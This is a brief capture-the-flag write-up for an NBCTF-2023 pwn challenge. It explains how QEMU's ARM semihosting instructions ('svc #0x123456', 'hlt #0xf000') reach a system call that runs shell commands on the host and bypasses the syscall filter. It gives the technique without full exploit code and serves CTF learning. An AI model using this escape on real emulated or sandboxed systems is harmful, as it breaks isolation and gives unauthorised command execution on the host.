By: unvariant

Tags: pwn NBCTF-2023

Problem Description:


Reveal Hints none

QEMU supports semihosting which is a way for embedded systems to run code on another system. That other system is one that is debugging the embedded processor and can hook into the execution.

The ABI defined two special instructions for invoking the semihosting mechanism in 32 bit ARM.

svc #0x123456


hlt #0xf000

The semihosting interface defines a system function that allows the program to execute a shell command on the host. QEMU implements this by passing the command directly to system, and most importantly it does not register as a syscall and bypasses the filter.